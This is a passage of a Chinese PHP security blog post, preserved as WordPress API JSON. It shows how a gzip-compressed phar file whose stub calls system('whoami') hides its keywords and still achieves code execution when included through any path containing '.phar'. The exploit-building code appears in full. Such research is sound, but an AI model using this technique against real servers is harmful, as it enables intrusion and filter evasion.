      \u6700\u540e\u7684\u7ed3\u8bba\u5c31\u662f\uff0c\u6bd4\u5982\u6211\u4eec\u751f\u6210\u4e86\u4e00\u4e2aphar\u6587\u4ef6\uff0c\u7136\u540e\u628a\u4ed6\u6253\u5305\u6210gz\u6587\u4ef6\uff0c\u5f53\u6211\u4eecinclude\u8fd9\u4e2agz\u6587\u4ef6\u65f6\uff0cphp\u4f1a\u9ed8\u8ba4\u628a\u8fd9\u4e2agz\u6587\u4ef6\u89e3\u538b\u56dephar\u8fdb\u884c\u89e3\u6790\uff0c\u6bd4\u5982\u6211\u4eec\u7528\u4e0b\u9762\u8fd9\u4e2a\u4ee3\u7801\u751f\u6210\u4e00\u4e2aphar\u6587\u4ef6\uff1a<\/p>\n\n\n\n
      <?php\n$phar = new Phar('exploit.phar');\n$phar->startBuffering();\n\n$stub = <<<'STUB'\n<?php\n    system('whoami');\n    __HALT_COMPILER();\n?>\nSTUB;\n\n$phar->setStub($stub);\n$phar->addFromString('test.txt', 'test');\n$phar->stopBuffering();\n\n?><\/code><\/pre>\n\n\n\n
      \u53ef\u4ee5\u770b\u5230\u73b0\u5728\u8fd8\u6709\u660e\u663e\u7684\u5173\u952e\u5b57\uff1a<\/p>\n\n\n\n
      \"\"\/<\/div><\/figure>\n\n\n\n
      \u73b0\u5728\u6253\u5305\u4e00\u4e0b\uff0c\u53ef\u4ee5\u770b\u5230\u5173\u952e\u5b57\u5df2\u7ecf\u5b8c\u5168\u6d88\u5931\u4e86\uff1a<\/p>\n\n\n\n
      \"\"\/<\/div><\/figure>\n\n\n\n
      \u5f53\u6211\u4eecinclude\u8fd9\u4e2aphar.gz\u6587\u4ef6\u65f6\uff0cphp\u4f1a\u81ea\u52a8\u89e3\u538b\u8fd9\u4e2agz\u6587\u4ef6\uff0c\u6240\u4ee5\u6700\u540e\u76f8\u5f53\u4e8e\u662f\u76f4\u63a5include\u8fd9\u4e2aphar\u6587\u4ef6\uff0c\u800c\u8fd9\u91cc\u6709\u5173\u952e\u5b57\uff1a<\/p>\n\n\n\n
      <?php\n    system('whoami');\n    __HALT_COMPILER();\n?><\/code><\/pre>\n\n\n\n
      \u6240\u4ee5\u5c31\u76f4\u63a5rce\u4e86\uff1a<\/p>\n\n\n\n
      \"\"\/<\/div><\/figure>\n\n\n\n
      \u5f53\u7136\uff0c\u5728\u524d\u9762\u6211\u4eec\u8ddf\u4ee3\u7801\u7684\u65f6\u5019\u5e94\u8be5\u8fd8\u8bb0\u5f97\uff0c\u4ed6\u7684\u5224\u65ad\u903b\u8f91\u662f\u53ea\u8981\u6587\u4ef6\u540d\u91cc\u6709.phar\u8fd9\u51e0\u4e2a\u5b57\u5c31\u884c\uff1a<\/p>\n\n\n\n
      \"\"\/<\/div><\/figure>\n\n\n\n
      \u6240\u4ee5\u4e8b\u5b9e\u4e0a\u6211\u4eec\u5b8c\u5168\u4e0d\u9700\u8981\u4fdd\u8bc1\u6700\u540einclude\u7684\u662f\u4e00\u4e2axxx.phar.gzip\u6587\u4ef6\uff0c\u53ea\u8981\u6587\u4ef6\u540d\u91cc\u6709.phar\u5373\u53ef\uff0c\u6240\u4ee5\u8bf4\u65e0\u8bba\u6211\u4eec\u662finclude 1.phar.png\u8fd8\u662f1.phar.html\u5747\u53ef\u4ee5\u6b63\u5e38rce\uff1a<\/p>\n\n\n\n
      \"\"\/<\/div><\/figure>\n\n\n\n
      \u751a\u81f3\u53ea\u8981\u5305\u542b\u7684\u8def\u5f84\u91cc\u5e26\u4e86.phar\u8fd9\u51e0\u4e2a\u5b57\u5c31\u80fd\u89e3\u6790 \u54ea\u6015\u662f\u76ee\u5f55\u4e5f\u884c\uff1a<\/p>\n\n\n\n
      \"\"\/<\/div><\/figure>\n\n\n\n
      \u4f46\u5982\u679c\u6ca1\u6709.phar\u8fd9\u51e0\u4e2a\u5b57\u5c31\u4e0d\u80fd\u89e3\u6790\u4e86\uff1a<\/p>\n\n\n\n
      \"\"\/<\/div><\/figure>\n\n\n\n
      \u540e\u8bb0<\/h1>\n\n\n\n
      \u592a\u4f1f\u5927\u4e86PHP<\/p>\n","protected":false},"excerpt":{"rendered":"
      \u524d\u8a00 \u5f53\u770b\u5b8c\u9646\u961f\u7684The End Of LFI?\u540e\uff0c\u672c\u6765\u4ee5\u4e3ainclude\u5df2\u7ecf\u73a9\u4e0d\u51fa\u4ec0\u4e48\u82b1\u6837\u4e86\uff0c\u6ca1\u60f3\u5230php\u4e0d […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-3921","post","type-post","status-publish","format-standard","hentry","category-1"],"_links":{"self":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/3921","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/comments?post=3921"}],"version-history":[{"count":3,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/3921\/revisions"}],"predecessor-version":[{"id":3927,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/3921\/revisions\/3927"}],"wp:attachment":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/media?parent=3921"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/categories?post=3921"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/tags?post=3921"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}